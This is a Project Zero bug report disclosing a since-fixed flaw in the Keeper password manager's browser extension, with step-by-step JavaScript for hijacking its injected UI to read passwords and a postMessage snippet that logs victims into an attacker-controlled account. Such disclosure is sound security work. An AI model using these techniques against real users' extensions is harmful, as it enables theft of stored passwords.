Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 917 Keeper: Trusted UI is injected into untrusted webpage
Starred by 2 users Project Member Reported by taviso@google.com, Aug 26 2016 Back to list
Status: Fixed
Owner:
Closed: Nov 1



Sign in to add a comment
I took a quick look at Keeper, a password manager for Windows, Mac, Linux. The extension injects it's trusted UI into untrusted webpages with a content script. I don't think that's safe to do.

I'm not a web developer, but you can see what I mean in the attached example. I only tested it in Chrome.

A more polished example is obviously possible.

The example does this:

1. Click the little keeper icon you add to input boxes, that's just: document.getElementById('keeper-icon-2').click();
2. Click the search button in the popup that appears.
3. Search for "Google", e.g. document.getElementById('keeper-search-box-input').value="Google"
4. wait for the search results to appear, then hide the iframe.
5. When the user is about to click, display it and then wait for the password to be inserted.
6. Now the page can read the password.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
Comment 1 Deleted
Project Member Comment 2 by taviso@google.com, Aug 26 2016
I tried to make the example more reliable.

keeper.html
5.0 KB View Download
Comment 3 Deleted
Project Member Comment 4 by taviso@google.com, Aug 26 2016
Keeper sent me an updated build that removes the search feature I was using. I suppose that solves the immediate problem. I noticed that the way messages were passed didn't seem safe though.

For example, it's possible to log someone into your account and then when they save their passwords, they're effectively giving them to you.

For example a website can do this:

x = window.open("https://keepersecurity.com/vault/");
x.postMessage({client: "ext", cmd: "logout"},"*")
x.postMessage({client: "ext", cmd: "login", login: "attacker@account.com", password: "attackerspassword"}, "*")

And now whenever you save a password, you're unknowingly saving it to the attackers. I asked why there isn't a check for message.origin == "chrome-extension://...", etc.

Project Member Comment 5 by taviso@google.com, Aug 27 2016
I uploaded the example here for testing.

https://lock.cmpxchg8b.com/keeper.html
Project Member Comment 6 by taviso@google.com, Aug 27 2016
Labels: -Restrict-View-Commit
Summary: Keeper: Trusted UI is injected into untrusted webpage (was: Keeper: trusted UI is injected into untrusted webpage)
It looks like the 10.1.3 update is live on the chrome web store, removing view restriction.
This issue has been fixed with Keeper Browser Extension v10.1.3 which is live on Chrome web store.  Below is the blog post related to the issue:

https://blog.keepersecurity.com/2016/08/28/security-update-for-keeper-browser-extension/

Project Member Comment 8 by taviso@google.com, Nov 1
Status: Fixed
Sign in to add a comment